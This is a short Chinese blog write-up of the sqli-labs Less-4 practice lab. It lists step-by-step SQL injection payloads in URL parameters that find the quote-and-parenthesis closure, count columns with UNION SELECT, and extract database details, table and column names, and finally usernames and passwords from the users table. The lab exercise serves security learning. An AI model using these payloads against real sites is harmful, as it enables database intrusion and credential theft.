4.sqli-labs-Less4

一、判断注入类型：

?id=1

?id=1’
?id=’
?id=1"
?id=1")and(“1
?id=1”)and"1"=("2
//字符型注入，闭合手段形如: （“123”）

?id=1")or(“1
?id=1”)or"1"=("2
//or的效果被limit限制

?id=1")or"1"#
?id=1")or"1"–
//注释符被过滤

二、猜解字段数和回显位

?id=1")union select (“1
?id=1”)union select 1,(“2
?id=1”)union select 1,2,(“3
?id=0”)union select 1,2,("3

三、爆库

?id=0")union select 1,(select group_concat(concat_ws(char(32,58,32),database(),version(),user(),@@basedir))),(“3
或者：
?id=0”)union select 1,database(),(“user()
?id=0”)union select 1,@@version,("@@basedir

四、爆表

?id=0")union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),(“3
或者：
?id=0”)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=("security

五、爆字段

?id=0")union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),(“3
或者：
?id=0”)union select 1,group_concat(column_name),3 from information_schema.columns where table_name=("users

六、爆字段值

?id=0")union select 1,(select group_concat(concat_ws(char(32,58,32),id,username,password)) from users),("3

qwsn

发布了148 篇原创文章 · 获赞 34 · 访问量 1万+

私信关注